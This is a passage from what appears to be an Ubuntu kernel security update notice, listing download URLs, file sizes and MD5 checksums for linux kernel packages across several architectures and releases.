http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb\n      Size/MD5:    63562 aa198524f22feac47e6afeb90b4814a3\n    http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb\n      Size/MD5:   300758 e2f88dfcf8062c76ba8feb73009c470c\n    http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb\n      Size/MD5:  3036096 18ba173775e4bd72614757f96464f43b\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.28-19-lpia_2.6.28-19.61_lpia.deb\n      Size/MD5:   643960 a59344b6416b7986fc4e381d2cff448b\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.28-19-lpia_2.6.28-19.61_lpia.deb\n      Size/MD5: 21804176 6d5ada4bd63dc0267ec128ec5523d603\n    http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.28-19.61_lpia.deb\n      Size/MD5:   767048 119ec87226497a4cd35ac1616c110f8b\n    http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb\n      Size/MD5:   303974 013d213d0147879eaf3b03ee5a52ba62\n    http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb\n      Size/MD5:   157420 daa1b45750cf096ca0f21c2e9805338c\n    http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb\n      Size/MD5:    24444 a4604496dbae27099d5e99be02661e86\n    http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb\n      Size/MD5:   260358 050d3379257c6db05af1d9cbea5246e5\n    http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb\n      Size/MD5:  2027504 b41779f2e28f1a64bfef1328e0d46025\n    http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb\n      Size/MD5:   149404 0b24ae1029ee3377f090ce81937f591b\n    http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb\n      Size/MD5:   184738 4a4709ebe1e07dba8e80164d5d99457e\n    http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb\n      Size/MD5:   143256 93d56d8675a88d483b206a0bd915cc10\n    http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb\n      Size/MD5:    34466 b307ad93ea4f7c264c20833070f32599\n    http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb\n      Size/MD5:     5496 ae5a05934e8cb5b52e0793ba2bf8804b\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb\n      Size/MD5:    85658 c8746bbbb6796a2bff3fa6b336ed74b4\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb\n      Size/MD5:    47404 6230bb1e8b46bd653ac5d3ef9d9052b7\n    http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb\n      Size/MD5:     8712 fed56dd339cc12bb2c623a54da9d5b3a\n    http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb\n      Size/MD5:    63108 18cf630fa14beb0692f7398167e8b691\n    http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb\n      Size/MD5:    14718 8ee6802e848c75ca39da8ee1e02f0314\n    http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb\n      Size/MD5:  1447856 77369ff1a3bd4417251f3f1de7dc504f\n    http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb\n      Size/MD5:    43896 f514d1c6dc5f0edf987eab1993eff850\n    http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb\n      Size/MD5:   155176 0dd0d60e9685c6f1f092e7fba12f0d2c\n    http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb\n      Size/MD5:   172682 daee398b65ec579129a974398bafe526\n    http://ports.ubuntu.com/pool/main/l/linux/virtio-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb\n      Size/MD5:     8152 f19e4bed18e1f803f2403c1f76bb4567\n\nUpdated packages for Ubuntu 9.10:\n\n  Source archives:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2_2.6.31-307.15.diff.gz\n      Size/MD5:  9270340 efbacad31add4310d608052e0138cdfc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2_2.6.31-307.15.dsc\n      Size/MD5:     2706 ab7417b57fac2e918ab18b71748eaa25\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2_2.6.31.orig.tar.gz\n      Size/MD5: 78278595 16c0355d3612806ef87addf7c9f8c9f9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-fsl-imx51/linux-fsl-imx51_2.6.31-112.28.diff.gz\n      Size/MD5:  4002602 7156a2ff98e4a29eca8db92dd27cae34\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-fsl-imx51/linux-fsl-imx51_2.6.31-112.28.dsc\n      Size/MD5:     2180 e004ede760b9ead8acfb08aae3626bd8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-fsl-imx51/linux-fsl-imx51_2.6.31.orig.tar.gz\n      Size/MD5: 78278595 16c0355d3612806ef87addf7c9f8c9f9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-mvl-dove/linux-mvl-dove_2.6.31-214.28.diff.gz\n      Size/MD5:  4613937 a6d34bc737f45065a7856ca478f09ded\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-mvl-dove/linux-mvl-dove_2.6.31-214.28.dsc\n      Size/MD5:     2214 2387eb27814bd67f0788fd0450f400ab\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-mvl-dove/linux-mvl-dove_2.6.31.orig.tar.gz\n      Size/MD5: 78278595 16c0355d3612806ef87addf7c9f8c9f9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.31-22.60.diff.gz\n      Size/MD5:  2968144 51d9f41be632d0069d48b6fb7c53b059\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.31-22.60.dsc\n      Size/MD5:     3782 1027672ce46ed3c00dd0fcc4682a64f9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.31.orig.tar.gz\n      Size/MD5: 78278595 16c0355d3612806ef87addf7c9f8c9f9\n\n  Architecture independent packages:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2-doc_2.6.31-307.15_all.deb\n      Size/MD5:  3801110 11ec385a097f99220d5ddb6c2e2f4002\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2-source-2.6.31_2.6.31-307.15_all.deb\n      Size/MD5: 64261132 ed0333508c22109f028ae2ef766fc85f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-headers-2.6.31-307_2.6.31-307.15_all.deb\n      Size/MD5:  9674276 489c1295818e3e5ee4832104c483a0ee\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc_2.6.31-22.60_all.deb\n      Size/MD5:  3802616 a36b05da0395ec7db681dc19fb2f1300\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-22_2.6.31-22.60_all.deb\n      Size/MD5:  9542888 f10672f2db8403df76eca5b20694b8f3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.31_2.6.31-22.60_all.deb\n      Size/MD5: 62194756 b7cc137763d5af113a71e31e6ac22f78\n\n  amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-headers-2.6.31-307-ec2_2.6.31-307.15_amd64.deb\n      Size/MD5:   611656 2c695d1b064b808c1a2302ab2b886977\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-image-2.6.31-307-ec2_2.6.31-307.15_amd64.deb\n      Size/MD5: 18766724 49915d82add98b1256e69fe1bfe8078e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb\n      Size/MD5:   221404 254b05d713505665c031b4496b163c22\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/char-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb\n      Size/MD5:    15634 c74946f44729c910272e9ea7818630b2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb\n      Size/MD5:    52140 f69d9ea44c436108e9d12948b8136090\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb\n      Size/MD5:    44830 cf091e89005a5a90931b7f752bdadf69\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb\n      Size/MD5:    50086 7aeca28683007786d5ebd9ef1ed3ac26\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb\n      Size/MD5:    92532 b98c59ba794fd8779c7d72bfaaed0197\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb\n      Size/MD5:    37776 b8bef8f976de7b77be419a138bcae78b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb\n      Size/MD5:   537596 6b955d65ff2d68e8d95051cf094907c3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb\n      Size/MD5:   130680 f33ba0ee944acc4719c2967a1dcabdb3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb\n      Size/MD5:    53836 f67f7cc6ef67dcf7f672fd569a89452f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb\n      Size/MD5:   310082 9c1873f4f9d43672eb590a7321e1d6f3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb\n      Size/MD5:  4360720 16490513f45ae6688ed2bde11abf9e81\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-22-generic_2.6.31-22.60_amd64.deb\n      Size/MD5:   708238 ece5100190ee7b1cfe205a988482f652\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-22-server_2.6.31-22.60_amd64.deb\n      Size/MD5:   706794 eabe25a6ab5ecf566b6155d1e40b098b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-22-generic_2.6.31-22.60_amd64.deb\n      Size/MD5: 28945438 dcaf7dcfd8fd1bb8396403a8385f00c6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-22-server_2.6.31-22.60_amd64.deb\n      Size/MD5: 28940552 0345077dd48fee880de7036f7b9565ea\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-22-virtual_2.6.31-22.60_amd64.deb\n      Size/MD5: 11766174 dd131468e97785447d16e271b9f0c96e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.31-22.60_amd64.deb\n      Size/MD5:   753492 0a0b60ed5f9fd5317d117b348c25a226\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb\n      Size/MD5:   168332 2698dddf736f1f55b43ee796f36025d4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb\n      Size/MD5:   202808 83c4daba95357805420dfd042b326624\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb\n      Size/MD5:    27744 04f33c682c35a27fb0622c0ccfc64539\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb\n      Size/MD5:   311822 4748943e01de51f9fa0afe1e6667ba11\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb\n      Size/MD5:  2281794 cc0444cb92dfe6d42f1c29cf37020399\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb\n      Size/MD5:   158660 ddaf46384d9657ea1afd15f0b7a04381\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb\n      Size/MD5:   203114 0a8ba89a3ac2c15fba026750b7724b9a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb\n      Size/MD5:   161070 67957e42b693445a8bec0d1e65e55026\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb\n      Size/MD5:    38052 7f306f8d2cab050417d6cb38857b5d5a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb\n      Size/MD5:     5762 39e5dbb1081ba9537468d1a927fd0da2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb\n      Size/MD5:    73772 a4bad6ca01c03a927453ad26b099cce4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb\n      Size/MD5:    22250 53b93aabb270063d193571b49d95b9e6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb\n      Size/MD5:     9538 29dde3870380ac336fbacaf92ba229ea\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb\n      Size/MD5:    39852 7e7b6dc05ceb31ac128631131cc4d523\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb\n      Size/MD5:    23488 023007868ca9edada0fb2c92805d9683\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb\n      Size/MD5:  1389890 cb421da7cd9f9dc1c2b7920d3cbd5d26\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb\n      Size/MD5:    47372 76db327e946e56267ebb075149dd74d6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb\n      Size/MD5:    51746 2d218a60e0c7df2b655e8dbde3b8fde0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb\n      Size/MD5:   129008 8e259b2e63ad1b7540ab5e280fd1185b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb\n      Size/MD5:    15818 bd77ac1c53d4013fd44d6e08e0607a0d\n\n  i386 architecture (x86 compatible Intel/AMD):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-headers-2.6.31-307-ec2_2.6.31-307.15_i386.deb\n      Size/MD5:   583698 c74a1a2666674f9f7868022638a44eec\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-image-2.6.31-307-ec2_2.6.31-307.15_i386.deb\n      Size/MD5: 18098198 aa80a9877a0e8e66b3eaeedf106d2735\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb\n      Size/MD5:   198856 75a1fabea67826c04b3f970855301f66\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/char-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb\n      Size/MD5:    32460 debd7f409c0590fbf8c54e4bfd353b0a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb\n      Size/MD5:    49946 a1fd0118b8702be8c81173ac13de49f0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb\n      Size/MD5:    42114 8ad595e8510acc850d85f2b15409c398\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb\n      Size/MD5:    45944 fe33cb34669e234be9c67b10786438e4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb\n      Size/MD5:    87406 f8c4148cb3a8f30c7a59e5dae4771175\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb\n      Size/MD5:    33766 fbea3cb1763e19feb0994cf8500132de\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb\n      Size/MD5:   534130 2d58da5dee752af1baedeb14a08c5f96\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb\n      Size/MD5:   128170 4723852ff55df632006c4927d13f114f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb\n      Size/MD5:    49746 a976e85f8ee996273f27a347df71a409\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb\n      Size/MD5:   295730 69eac5e852238c1a21440a9241b14832\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb\n      Size/MD5:  4196436 e5b97c5775a2511f10966890095da19f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-22-386_2.6.31-22.60_i386.deb\n      Size/MD5:   685230 67f5b3274f3a20bb452797106ec9f137\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-22-generic-pae_2.6.31-22.60_i386.deb\n      Size/MD5:   687020 7d21f4a09ce0a273cb6d7503e72ee6ae\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-22-generic_2.6.31-22.60_i386.deb\n      Size/MD5:   686244 65573f1a4fa26cf1d025885ba2cebbbc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-22-386_2.6.31-22.60_i386.deb\n      Size/MD5: 28823902 18b1320dcc9bc2283011911c04237711\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-22-generic-pae_2.6.31-22.60_i386.deb\n      Size/MD5: 28958792 dc3e36f69d9881d9d26e8cd2c44800cd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-22-generic_2.6.31-22.60_i386.deb\n      Size/MD5: 28891678 aae1afae57ad58337b6454bb13ae72a7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-22-virtual_2.6.31-22.60_i386.deb\n      Size/MD5: 11300176 dc82553b7990534cc39f9f4cc4e00f87\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.31-22.60_i386.deb\n      Size/MD5:   753460 b871864698fe96c8c053de1ab7d28b3e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb\n      Size/MD5:   172874 cf867621a1c6af7d2df0b32c31d47f3a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb\n      Size/MD5:   186174 421f2c1b6a7a9211742bcd0116d5b16e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb\n      Size/MD5:    28924 bf4c063e743601b1838970be5eb4665f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb\n      Size/MD5:   292874 8b3015efe3f52550b68f137e72be5632\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb\n      Size/MD5:  2400172 d3a5e3e28a6f54f5ac55255fefe8d753\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb\n      Size/MD5:   142002 863be5985847e2c869ccb738ea6eacf7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb\n      Size/MD5:   189594 5451c54d33a9917ef47a39385a2d60a9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb\n      Size/MD5:   148538 4f7e33f693ccc7d0fd540942fef72b5a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb\n      Size/MD5:    35292 8faa6b0d2be91563e4f946a97752a550\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb\n      Size/MD5:     6840 152a8cf38c19823497507b9f3663df86\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb\n      Size/MD5:    86104 cf1457aa150576d327043920a45cff27\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb\n      Size/MD5:    46424 b2baacb7c5ffe63175430863e7d6878e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb\n      Size/MD5:     8918 9b41564f8be9827daa0254d9308ea154\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb\n      Size/MD5:    36282 291e645259303b5c8802e64740569845\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb\n      Size/MD5:    21668 467a00b25bb160d9e117fc910f31784a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb\n      Size/MD5:  1495340 ac8a383261c23880b7f2f98dc9ca0f97\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb\n      Size/MD5:    44088 12d57d9e5921a6694e98f72cd661a89f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb\n      Size/MD5:    48548 06ffbb6a1b5d63dd5187dc4c96d81004\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb\n      Size/MD5:   117862 334d8feda1b33280c0c767eb59fc8941\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb\n      Size/MD5:    14532 28a556e15bd25cacb435f06bc40de557\n\n  lpia architecture (Low Power Intel Architecture):\n\n    http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb\n      Size/MD5:   198816 cabad71083cee31770876846c9b3e5f0\n    http://ports.ubuntu.com/pool/main/l/linux/char-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb\n      Size/MD5:    32446 6aff2bbc6e25c9ed6dfe471c79f9e63e\n    http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb\n      Size/MD5:    49948 a322353219ca799650b5726a6c06b1d6\n    http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb\n      Size/MD5:    42156 bb1c584d16c683ad60b94886115201bc\n    http://ports.ubuntu.com/pool/main/l/linux/fb-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb\n      Size/MD5:    45934 ce7abfdde991057d5de236cc7c92dd06\n    http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb\n      Size/MD5:    87392 5a3de6c8b7e9f7789d180572b09dc2ff\n    http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb\n      Size/MD5:    33758 73cb370ad891451b4d0bc88705010ae2\n    http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb\n      Size/MD5:   534312 6deae522a3c870b57491d1da33d886bd\n    http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb\n      Size/MD5:   128220 9301688d4020d499ed969748cb732bdc\n    http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb\n      Size/MD5:    49750 c3fc2a64a7415c42a60be5284785ac0c\n    http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb\n      Size/MD5:   295734 7b6c3dfa99d318e9202a33348b0b7f40\n    http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb\n      Size/MD5:  4197456 d122014f54ef4ab940dc19ec321d6286\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-22-lpia_2.6.31-22.60_lpia.deb\n      Size/MD5:   684840 c139f2a52780e291cc978594db715c14\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-22-lpia_2.6.31-22.60_lpia.deb\n      Size/MD5: 28892608 4bf6a29734b5aa254ca96d4c0f26ff29\n    http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.31-22.60_lpia.deb\n      Size/MD5:   753444 9e4b00e5d9f5a894ba2e088c3d15e280\n    http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb\n      Size/MD5:   172932 8478bc14f1f14a05a4e93b2356428c29\n    http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb\n      Size/MD5:   186154 49c9a729f5b7cd5f127d8f45437dd162\n    http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb\n      Size/MD5:    28912 267006f0a11aaf673cf8f3b3f3abaeb5\n    http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb\n      Size/MD5:   292858 7761b4f00c9257ce5b7873d76f1c5ea4\n    http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb\n      Size/MD5:  2400346 e2ab63a68d1afb4b84de59722af76fad\n    http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb\n      Size/MD5:   141982 32b0be2ea446d44c0796ead47f311aed\n    http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb\n      Size/MD5:   189584 29474120e1018740d2cedd3c560d0c1f\n    http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb\n      Size/MD5:   148528 8a3914c5c04e9967f99d5b71f0630c22\n    